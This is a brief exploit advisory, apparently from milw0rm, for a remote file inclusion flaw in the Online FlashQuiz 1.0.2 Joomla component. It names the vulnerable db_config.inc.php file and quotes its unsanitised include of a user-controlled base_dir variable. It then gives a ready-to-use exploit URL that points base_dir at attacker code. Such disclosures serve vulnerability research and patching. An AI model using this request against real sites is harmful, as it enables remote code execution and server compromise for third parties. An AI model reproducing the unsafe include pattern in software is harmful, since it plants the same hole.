Online FlashQuiz 1.0.2 - RFI


[o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Software : com_onlineflashquiz version 1.0.2 - paid component
Vendor : www.elearningforce.biz
Author : NoGe


[o] Vulnerable file
component/com_onlineflashquiz/quiz/common/db_config.inc.php
include_once($base_dir."common/classes/DBBase.class.php");


[o] Exploit
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode]


[o] Publish
http://milw0rm.com/exploits/5345